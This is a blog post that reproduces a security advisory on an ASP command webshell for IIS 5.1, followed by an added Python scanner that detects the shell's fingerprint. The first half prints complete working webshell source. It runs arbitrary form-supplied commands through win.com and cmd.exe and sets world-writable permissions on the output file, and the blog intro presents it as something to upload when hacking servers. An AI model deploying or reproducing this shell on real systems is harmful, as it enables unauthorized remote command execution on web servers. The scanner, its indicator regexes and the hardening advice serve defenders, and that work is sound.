Trust Me!! Trust You!!
A WebShell for hacking ASP systems running on XP's PWS or on 2003

Web programming
2007/04/06 01:46

The WebShells that were often uploaded to the server (when possible :) ) when hacking web systems using ASP on Windows 2000 did not run on IIS 5.1, i.e. XP's PWS, or on the IIS of 2003; this is said to be ASP source in which that problem has been solved(?).
========================================================================
'ASP Cmd Shell On IIS 5.1
'brett.moore (at) security-assessment (dot) com [email concealed]
========================================================================

ASP shells have been around since the dawn of time. On IIS 5.0 and prior it
was simple to create a 'command prompt shell' using code similar to:

<%
Set oS = Server.CreateObject("WSCRIPT.SHELL")
output = oS.exec("cmd.exe > /c " & request("command")).stdout.readall
response.write output
%>

Permissions changes in IIS 5.1 prevented this method from working as
execution access was revoked to the IUSR_Machine user.

During one boring afternoon it was decided to find a way around this, and
what we found was 'slightly' interesting.

When IIS checks to see if an executable has 'execute' rights it is
checking against IUSR_Machine. If execute rights are granted then the
new process is created, under the IWAM_Machine account.

Thus all that was needed was an executable that could be run by IUSR_Machine
and would then spawn an instance of cmd.exe.

We set about seeing what executables could be run by IUSR_Machine. It turns
out that execution access has been revoked to all files with the .exe
extension. We did however locate several .com files that could still be
executed. One in particular, 'win.com', takes a command line as a parameter
and will execute it.

Because of the 'double spawning' we can not make use of .stdout.readall, and
need to revert to outputting to a file, and reading it back in.

Due to the process executing under a different account than that of the ASP
processor, we need to jump through a couple of hoops.
* The folder that we use must be WRITEABLE by IWAM_Machine
* The folder that we use must be READABLE by IUSR_Machine
* We need to alter file permissions to allow IUSR_Machine access to read
  the file created by IWAM_Machine

The accesschk tool from sysinternals can easily identify a valid location.
Our testing came up with c:\windows\pchealth\ERRORREP\QHEADLES

IIS6.0 revokes access to both IUSR_Machine and IWAM_Machine, and therefore
this technique will not work on that platform.

------------------------------------------------------------------------
<%
Dim oS,oSNet,oFSys, oF,szCMD, szTF
On Error Resume Next
Set oS = Server.CreateObject("WSCRIPT.SHELL")
Set oSNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.Form("C")

If (szCMD <> "") Then
szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" & oFSys.GetTempName()
' Here we do the command
Call oS.Run("win.com cmd.exe /c """ & szCMD & " > " & szTF & """",0,True)
response.write szTF
' Change perms
Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G everyone:F",0,True)
Set oF = oFSys.OpenTextFile(szTF,1,False,0)
End If
%>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name="C" size=70 value="<%= szCMD %>">
<input type=submit value="Run"></FORM><PRE>
Machine: <%=oSNet.ComputerName%><BR>
Username: <%=oSNet.UserName%><br>
<%
If (IsObject(oF)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oF.ReadAll)
oF.Close
Call oS.Run("win.com cmd.exe /c del "& szTF,0,True)
End If
%>
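From a defender's side, the useful thing to take from the advisory is that this shell has a very specific fingerprint: a WSCRIPT.SHELL object, cmd.exe launched through win.com, a hidden synchronous .Run call, a temp file under pchealth\ERRORREP, and a cacls call that grants Everyone full control on that file, with the command string coming straight out of Request.Form. The following Python script is an added example for incident responders and is not part of the advisory or of this blog post: it scans ASP source for those indicators, adds a simple per-line check that a Request-derived variable reaches a .Run( or .exec( call, and returns a verdict. The regular expressions, the scoring thresholds, and the three sample ASP snippets are my own construction, chosen to mirror the patterns described above rather than to be a general webshell scanner.

```python
"""Scan classic-ASP source for the IIS 5.1 win.com command-shell pattern.

Added example for responders; the indicators below are an assumption
derived from the advisory text, not an official signature set.
"""
import re
from pathlib import Path

# One regex per behaviour the advisory describes. Matching the concrete
# behaviours rather than the bare word "WScript" keeps false positives on
# ordinary pages (which may legitimately use WSCRIPT.SHELL) low.
INDICATORS = {
    "wscript_shell":   re.compile(r'CreateObject\(\s*"WSCRIPT\.SHELL"', re.I),
    "win_com_cmd":     re.compile(r'\bwin\.com\s+cmd(\.exe)?\b', re.I),
    "cacls_everyone":  re.compile(r'\bcacls(\.exe)?\b[^\n]*?/G\s+everyone:F', re.I),
    "errorrep_tmp":    re.compile(r'pchealth\\ERRORREP', re.I),
    "hidden_sync_run": re.compile(r'\.Run\([^\n]*,\s*0\s*,\s*True\s*\)', re.I),
}

# "var = Request(...)", "var = Request.Form(...)", "var = Request.QueryString(...)"
REQUEST_ASSIGN = re.compile(
    r'^\s*(\w+)\s*=\s*Request(?:\.Form|\.QueryString)?\s*\(', re.I | re.M)


def scan_asp_source(src: str) -> dict:
    """Return a dict of indicator name -> bool for one ASP source text."""
    hits = {name: bool(rx.search(src)) for name, rx in INDICATORS.items()}
    # Crude taint check: any variable assigned from Request that later
    # appears on a line containing a .Run( or .exec( call.
    tainted = {m.group(1) for m in REQUEST_ASSIGN.finditer(src)}
    hits["request_reaches_run"] = any(
        re.search(rf'\.(Run|exec)\(.*\b{re.escape(var)}\b', line, re.I)
        for var in tainted
        for line in src.splitlines()
    )
    return hits


def verdict(src: str) -> str:
    """Collapse the indicator hits into one of three triage outcomes."""
    hits = scan_asp_source(src)
    score = sum(hits.values())
    if hits["request_reaches_run"] or score >= 3:
        return "likely command shell"
    if score >= 1:
        return "review"          # e.g. a page that uses WSCRIPT.SHELL for something benign
    return "clean"


def scan_tree(root: str):
    """Yield (path, verdict) for every .asp/.asa file below root."""
    for path in Path(root).rglob("*"):
        if path.suffix.lower() in (".asp", ".asa") and path.is_file():
            yield path, verdict(path.read_text(errors="ignore"))


# --- constructed sample inputs (not real files from any server) ---------
SUSPECT_SAMPLE = r'''<%
Set oS = Server.CreateObject("WSCRIPT.SHELL")
szCMD = Request.Form("C")
szTF = "c:\windows\pchealth\ERRORREP\QHEADLES\" & oFSys.GetTempName()
Call oS.Run("win.com cmd.exe /c " & szCMD & " > " & szTF, 0, True)
Call oS.Run("win.com cmd.exe /c cacls.exe " & szTF & " /E /G everyone:F", 0, True)
%>'''

BENIGN_SAMPLE = '''<%
Set oFSys = Server.CreateObject("Scripting.FileSystemObject")
Set oF = oFSys.OpenTextFile(Server.MapPath("news.txt"), 1, False)
Response.Write Server.HTMLEncode(oF.ReadAll)
oF.Close
%>'''

# Uses WSCRIPT.SHELL but never runs anything from user input: worth a look, not an alert.
ENV_SAMPLE = '''<%
Set oS = Server.CreateObject("WSCRIPT.SHELL")
Response.Write oS.ExpandEnvironmentStrings("%COMPUTERNAME%")
%>'''

if __name__ == "__main__":
    for name, sample in [("suspect", SUSPECT_SAMPLE),
                         ("benign", BENIGN_SAMPLE),
                         ("env", ENV_SAMPLE)]:
        print(f"{name:8s} -> {verdict(sample)}  {scan_asp_source(sample)}")
```

Run it against a copy of a web root with `scan_tree(r"C:\Inetpub\wwwroot")` (path assumed) and triage the "likely command shell" hits first; the "review" bucket is where legitimate WSCRIPT.SHELL users and obfuscated variants will land, so treat it as a queue rather than noise. Because the shell in the advisory writes its output files under c:\windows\pchealth\ERRORREP\QHEADLES, a second, independent check is simply to look for unexpected temp files in that folder and to tighten its ACL so IWAM_Machine can no longer write there.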